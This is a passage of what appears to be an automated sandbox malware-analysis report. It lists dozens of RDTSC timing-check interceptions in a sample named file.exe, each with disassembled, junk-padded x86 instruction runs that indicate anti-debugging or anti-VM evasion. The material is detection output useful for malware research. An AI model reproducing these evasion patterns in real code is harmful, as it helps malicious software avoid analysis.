                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9FE56 second address: F9FE7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F1Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FFAAD0A8F21h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA46BD second address: FA46E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FFAACBEF8D9h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAAA02 second address: FAAA08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAAA08 second address: FAAA22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAACBEF8D6h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAAA22 second address: FAAA4E instructions: 0x00000000 rdtsc 0x00000002 jc 00007FFAAD0A8F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FFAAD0A8F27h 0x00000012 push eax 0x00000013 push edx 0x00000014 jp 00007FFAAD0A8F16h 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAAFAC second address: FAAFB2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAB0EF second address: FAB114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAAD0A8F1Bh 0x00000009 pop edi 0x0000000a jmp 00007FFAAD0A8F25h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAB279 second address: FAB287 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FFAACBEF8C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAB70D second address: FAB713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAB713 second address: FAB71E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAB71E second address: FAB725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAB725 second address: FAB72F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FFAACBEF8C6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAB72F second address: FAB752 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FFAAD0A8F16h 0x00000008 jmp 00007FFAAD0A8F25h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FABB88 second address: FABB97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAACBEF8CAh 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2F15C second address: F2F160 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2F160 second address: F2F166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAF404 second address: FAF40F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAF40F second address: FAF413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7A7A0 second address: F7A7A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7A7A4 second address: F5F9A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007FFAACBEF8C8h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 lea eax, dword ptr [ebp+1247F561h] 0x0000002b mov dword ptr [ebp+122D22C6h], ecx 0x00000031 push eax 0x00000032 jmp 00007FFAACBEF8D5h 0x00000037 mov dword ptr [esp], eax 0x0000003a jmp 00007FFAACBEF8CFh 0x0000003f call dword ptr [ebp+122D2435h] 0x00000045 push esi 0x00000046 pushad 0x00000047 push ecx 0x00000048 pop ecx 0x00000049 jmp 00007FFAACBEF8D4h 0x0000004e jmp 00007FFAACBEF8CEh 0x00000053 popad 0x00000054 ja 00007FFAACBEF8CAh 0x0000005a pop esi 0x0000005b push eax 0x0000005c push edx 0x0000005d push edi 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7A9C8 second address: F7A9DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7AD7B second address: F7AD7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7AD7F second address: F7AD94 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 ja 00007FFAAD0A8F16h 0x0000000d pop edx 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7AD94 second address: F7AD98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7AE6F second address: F7AE74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7AF58 second address: F7AF8A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FFAACBEF8CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jl 00007FFAACBEF8C6h 0x00000014 jmp 00007FFAACBEF8D7h 0x00000019 popad 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7B130 second address: F7B136 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7B136 second address: F7B13A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7B13A second address: F7B13E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7B13E second address: F7B164 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jns 00007FFAACBEF8D4h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7B164 second address: F7B1C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FFAAD0A8F1Ch 0x0000000c jmp 00007FFAAD0A8F21h 0x00000011 popad 0x00000012 popad 0x00000013 mov eax, dword ptr [eax] 0x00000015 pushad 0x00000016 jng 00007FFAAD0A8F21h 0x0000001c jmp 00007FFAAD0A8F1Bh 0x00000021 js 00007FFAAD0A8F1Ch 0x00000027 jnc 00007FFAAD0A8F16h 0x0000002d popad 0x0000002e mov dword ptr [esp+04h], eax 0x00000032 push eax 0x00000033 push edx 0x00000034 push edi 0x00000035 jmp 00007FFAAD0A8F1Fh 0x0000003a pop edi 0x0000003b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7BAA5 second address: F60611 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jmp 00007FFAACBEF8D0h 0x00000011 call dword ptr [ebp+122D3874h] 0x00000017 jnp 00007FFAACBEF900h 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAFBBA second address: FAFBCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007FFAAD0A8F16h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB0003 second address: FB001C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAACBEF8D4h 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB289E second address: FB28AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FFAAD0A8F18h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB28AA second address: FB28AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB28AF second address: FB28C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FFAAD0A8F16h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007FFAAD0A8F16h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB8C60 second address: FB8C6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBDFFA second address: FBE019 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FFAAD0A8F23h 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBE019 second address: FBE049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAACBEF8CCh 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FFAACBEF8CCh 0x00000014 push ebx 0x00000015 push esi 0x00000016 pop esi 0x00000017 jmp 00007FFAACBEF8CAh 0x0000001c pop ebx 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBE4DF second address: FBE4E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBE7C3 second address: FBE7C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBEA90 second address: FBEA95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBEC17 second address: FBEC41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FFAACBEF8D5h 0x0000000b popad 0x0000000c jo 00007FFAACBEF8CEh 0x00000012 jnp 00007FFAACBEF8C6h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBEC41 second address: FBEC4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBEC4A second address: FBEC53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBEC53 second address: FBEC57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBEDC4 second address: FBEDF5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FFAACBEF8EBh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBEDF5 second address: FBEDF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBEF61 second address: FBEF67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBEF67 second address: FBEF6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBEF6B second address: FBEF6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBEF6F second address: FBEF92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFAAD0A8F29h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC45A4 second address: FC45A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC45A8 second address: FC45B0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC45B0 second address: FC45C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAACBEF8D0h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC45C6 second address: FC45F3 instructions: 0x00000000 rdtsc 0x00000002 je 00007FFAAD0A8F16h 0x00000008 jmp 00007FFAAD0A8F26h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 je 00007FFAAD0A8F16h 0x0000001a push edx 0x0000001b pop edx 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC3BEB second address: FC3BFF instructions: 0x00000000 rdtsc 0x00000002 ja 00007FFAACBEF8C6h 0x00000008 jmp 00007FFAACBEF8CAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC492F second address: FC4948 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F24h 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC4948 second address: FC4955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC4AC4 second address: FC4AD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAAD0A8F1Bh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC4AD3 second address: FC4AF1 instructions: 0x00000000 rdtsc 0x00000002 js 00007FFAACBEF8C6h 0x00000008 js 00007FFAACBEF8C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jl 00007FFAACBEF8D2h 0x00000016 jnl 00007FFAACBEF8C6h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC4AF1 second address: FC4B14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FFAAD0A8F24h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC4B14 second address: FC4B1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC4B1A second address: FC4B20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC4B20 second address: FC4B25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC4C3D second address: FC4C51 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FFAAD0A8F16h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007FFAAD0A8F18h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC4C51 second address: FC4C88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c jmp 00007FFAACBEF8D7h 0x00000011 push esi 0x00000012 pop esi 0x00000013 pop esi 0x00000014 jmp 00007FFAACBEF8CBh 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC8242 second address: FC8246 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC7CC0 second address: FC7CEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jno 00007FFAACBEF8C6h 0x00000009 pop eax 0x0000000a jmp 00007FFAACBEF8CBh 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jc 00007FFAACBEF8DCh 0x00000017 pushad 0x00000018 jne 00007FFAACBEF8C6h 0x0000001e push eax 0x0000001f pop eax 0x00000020 jp 00007FFAACBEF8C6h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC7FC3 second address: FC7FC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCA826 second address: FCA830 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FFAACBEF8C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F378B0 second address: F378B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F378B6 second address: F378CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jns 00007FFAACBEF8C8h 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jc 00007FFAACBEF8C6h 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCF49F second address: FCF4FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F20h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e jo 00007FFAAD0A8F16h 0x00000014 pop esi 0x00000015 ja 00007FFAAD0A8F28h 0x0000001b jmp 00007FFAAD0A8F22h 0x00000020 pushad 0x00000021 push edx 0x00000022 pop edx 0x00000023 jmp 00007FFAAD0A8F21h 0x00000028 js 00007FFAAD0A8F16h 0x0000002e popad 0x0000002f popad 0x00000030 jo 00007FFAAD0A8F1Eh 0x00000036 push ebx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCF65B second address: FCF669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAACBEF8CAh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCF669 second address: FCF679 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCF679 second address: FCF699 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FFAACBEF8CEh 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007FFAACBEF8C6h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCF699 second address: FCF69D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCF69D second address: FCF6B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FFAACBEF8C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jc 00007FFAACBEF8C6h 0x00000013 jnc 00007FFAACBEF8C6h 0x00000019 pop edx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCF82E second address: FCF832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCF832 second address: FCF857 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FFAACBEF8E3h 0x0000000c jmp 00007FFAACBEF8D7h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD47F7 second address: FD47FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD47FB second address: FD4814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FFAACBEF8D1h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD4969 second address: FD498E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FFAAD0A8F28h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD4C27 second address: FD4C41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FFAACBEF8CFh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD4C41 second address: FD4C45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD4C45 second address: FD4C6C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FFAACBEF8D8h 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 pop edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD5047 second address: FD504B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD504B second address: FD507B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D1h 0x00000007 jmp 00007FFAACBEF8D8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
